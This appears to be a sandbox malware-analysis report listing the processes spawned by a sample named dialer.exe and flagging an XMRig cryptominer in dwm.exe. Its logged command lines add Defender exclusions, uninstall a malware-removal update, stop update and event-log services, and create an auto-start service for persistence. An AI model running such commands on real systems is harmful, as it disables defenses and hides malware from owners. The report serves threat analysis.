                                                Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe"
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Users\user\AppData\Local\Temp\dialer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\dialer.exe
                                                Imagebase:0x7ff7c9b10000
                                                File size:5'290'264 bytes
                                                MD5 hash:0BCBEA7313655A42ECC0A1FDBCF37993
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 79%, ReversingLabs
                                                • Detection: 65%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:10
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:14
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\wusa.exe
                                                Wow64 process (32bit):false
                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff682d20000
                                                File size:345'088 bytes
                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:17
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:24
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:27
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:28
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:29
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:30
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:31
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:32
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe delete "Build"
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:33
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:34
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:35
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto"
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:36
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:37
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:38
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe start "Build"
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:39
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:40
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:41
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\ProgramData\dialer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\ProgramData\dialer.exe
                                                Imagebase:0x7ff785910000
                                                File size:5'290'264 bytes
                                                MD5 hash:0BCBEA7313655A42ECC0A1FDBCF37993
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 79%, ReversingLabs
                                                • Detection: 65%, Virustotal
                                                Has exited:true

                                                Target ID:42
                                                Start time:00:46:05
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:43
                                                Start time:00:46:05
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:44
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:45
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:46
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:47
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:48
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\wusa.exe
                                                Wow64 process (32bit):false
                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff682d20000
                                                File size:345'088 bytes
                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:49
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:50
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:51
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:52
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:53
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:54
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:55
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:56
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:57
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:58
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:59
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:60
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:61
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:62
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:63
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:64
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:65
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:66
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\dwm.exe
                                                Wow64 process (32bit):false
                                                Commandline:dwm.exe
                                                Imagebase:0x7ff79d4a0000
                                                File size:94'720 bytes
                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                Has exited:false

                                                Target ID:68
                                                Start time:00:46:41
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                Imagebase:0x7ff7e52b0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:11.5%
                                                  Dynamic/Decrypted Code Coverage:0%
